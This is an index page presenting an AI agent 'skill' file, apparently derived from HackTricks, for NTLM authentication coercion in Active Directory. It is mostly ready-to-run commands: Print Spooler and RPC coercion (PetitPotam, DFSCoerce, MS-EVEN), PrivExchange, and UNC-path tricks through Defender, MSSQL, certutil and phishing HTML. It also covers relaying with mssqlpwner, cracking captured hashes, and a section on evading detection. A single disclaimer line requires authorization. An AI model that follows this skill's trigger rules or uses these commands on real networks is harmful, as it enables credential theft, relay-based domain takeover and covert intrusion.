OpenSkillIndex← back to search

Hacktricks-skills windows-ntlm-coercion

Guide for NTLM authentication coercion attacks in Active Directory environments. Use this skill whenever the user needs to force Windows systems to authenticate to an attacker-controlled host, capture NTLM hashes, or perform relay attacks. Trigger on mentions of: authentication coercion, NTLM relay, Print Spooler abuse, RPC coercion, PetitPotam, MS-EVEN, MS-EFSR, PrivExchange, or any scenario where you need to make a Windows system authenticate to a specific target.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/windows-hardening/active-directory-methodology/printers-spooler-service-abuse/SKILL.MD
source content

Windows NTLM Authentication Coercion

This skill provides methodology for forcing Windows systems to authenticate to attacker-controlled hosts, enabling NTLM hash capture and relay attacks in Active Directory environments.

⚠️ Authorization Required

Only use these techniques on systems you own or have explicit written authorization to test. Unauthorized use is illegal and unethical.

When to Use This Skill

Use this skill when:

  • You need to capture NTLM hashes from Windows systems
  • You want to perform NTLM relay attacks
  • You're testing Active Directory security controls
  • You need to coerce authentication from specific targets (DCs, servers, workstations)
  • You're assessing Print Spooler, RPC, or Exchange vulnerabilities

Core Concept

NTLM authentication coercion tricks Windows into initiating an authentication request to a host you control. When the target authenticates, you can:

  1. Capture the NTLM hash (for offline cracking)
  2. Relay the authentication to another service (for privilege escalation)
  3. Extract tickets (if unconstrained delegation is configured)

Method 1: Print Spooler Service Abuse

Prerequisites

  • Print Spooler service enabled on target
  • Valid domain credentials
  • Network access to target

Step 1: Enumerate Windows Servers

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

Step 2: Check for Spooler Service

Option A: PowerShell (Windows)

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Option B: rpcdump.py (Linux)

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Step 3: Trigger Authentication

Windows (SpoolSample):

SpoolSample.exe <TARGET> <RESPONDER_IP>

Linux (dementor.py):

python dementor.py -d domain -u username -p password <RESPONDER_IP> <TARGET>

Linux (printerbug.py):

printerbug.py 'domain/username:password'@<Printer_IP> <RESPONDER_IP>

Combining with Unconstrained Delegation

If you've compromised a host with unconstrained delegation:

  1. Force the printer to authenticate to that host
  2. The printer's computer account TGT gets cached in memory
  3. Extract the ticket and use Pass-the-Ticket

Method 2: RPC Coercion

Coercion Matrix

ProtocolPipeInterface UUIDOpnumsTool
MS-RPRN\PIPE\spoolss12345678-1234-abcd-ef00-0123456789ab62, 65PrinterBug
MS-PAR\PIPE\spoolss76f03f96-cdfd-44fc-a22c-64950a0012090-
MS-EFSR\PIPE\efsrpcc681d488-d850-11d0-8c52-00c04fd90f7e0,4,5,6,7,12,13,15,16PetitPotam
MS-DFSNM\PIPE\netdfs4fc742e0-4a10-11cf-8273-00aa004ae67312, 13DFSCoerce
MS-FSRVP\PIPE\FssagentRpca8e0653c-2744-4389-a61d-7373df8b22928, 9ShadowCoerce
MS-EVEN\PIPE\even82273fdc-e32a-18c3-3f78-827929dc23ea9CheeseOunce

MS-EVEN: ElfrOpenBELW (Opnum 9)

Most effective for Tier 0 assets (DCs, RODCs, Citrix)

  • Interface: MS-EVEN over \PIPE\even
  • Call: 
    ElfrOpenBELW(UNCServerName, BackupFileName, MajorVersion, MinorVersion, LogHandle)
  • Effect: Target attempts to open backup log path and authenticates to attacker UNC
  • Use case: Coerce DCs to emit NetNTLM, relay to AD CS endpoints (ESC8/ESC11)

Method 3: PrivExchange (Exchange Server)

Overview

Exchange Server's 

PushSubscription
feature allows any domain user with a mailbox to force the Exchange server to authenticate to any client-provided host over HTTP.

Impact

  • Exchange service runs as SYSTEM
  • Has WriteDacl privileges on domain (pre-2019 CU)
  • Can relay to LDAP and extract NTDS.dit
  • Grants Domain Admin access with any authenticated user account

Execution

# Use PrivExchange tool
python privexchange.py -u username -p password -t <TARGET_IP> -d domain

Method 4: Inside Windows Coercion

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR_IP>\file.txt

MSSQL Coercion

Using xp_dirtree:

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

Using MSSQLPwner:

# Relay to specific server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Relay using chain ID
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Local server relay
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Certutil Coercion

certutil.exe -syncwithWU \\127.0.0.1\share

Method 5: HTML Injection

Via Email

Send email with embedded image to target user:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

When opened, the user's browser attempts to authenticate to the UNC path.

Via MitM

Inject into web pages the user visits:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Post-Exploitation: Cracking NTLMv1

Capture Setup

Set Responder challenge to weak value:

# In Responder configuration
challenge = "1122334455667788"

Cracking

Use hashcat or john:

# Hashcat (mode 5600 for NTLMv1)
hashcat -m 5600 ntlm_hashes.txt wordlist.txt

# John the Ripper
john --format=ntlmv1 ntlm_hashes.txt

Tool References

ToolPurposeRepository
PetitPotamMS-EFSR coercionhttps://github.com/topotam/PetitPotam
DFSCoerceMS-DFSNM coercionhttps://github.com/Wh04m1001/DFSCoerce
ShadowCoerceMS-FSRVP coercionhttps://github.com/ShutdownRepo/ShadowCoerce
CoercerRPC coercionhttps://github.com/p0dalirius/Coercer
MSSQLPwnerMSSQL relayhttps://github.com/ScorpionesLabs/MSSqlPwner
SharpSystemTriggersC# auth triggershttps://github.com/cube0x0/SharpSystemTriggers
krbrelayxRelay attackshttps://github.com/dirkjanm/krbrelayx

Best Practices

  1. Start with MS-EVEN - Most reliable for DCs and Tier 0
  2. Use multiple methods - Different systems have different services enabled
  3. Check for unconstrained delegation - Can extract TGTs from coerced authentications
  4. Combine with AD CS - Relay to ESC8/ESC11 for certificate enrollment
  5. Document findings - Track which methods work on which systems

Detection Evasion

  • Use legitimate-looking UNC paths
  • Time attacks during business hours
  • Avoid rapid-fire attempts that trigger alerts
  • Consider using existing tools already on the network

References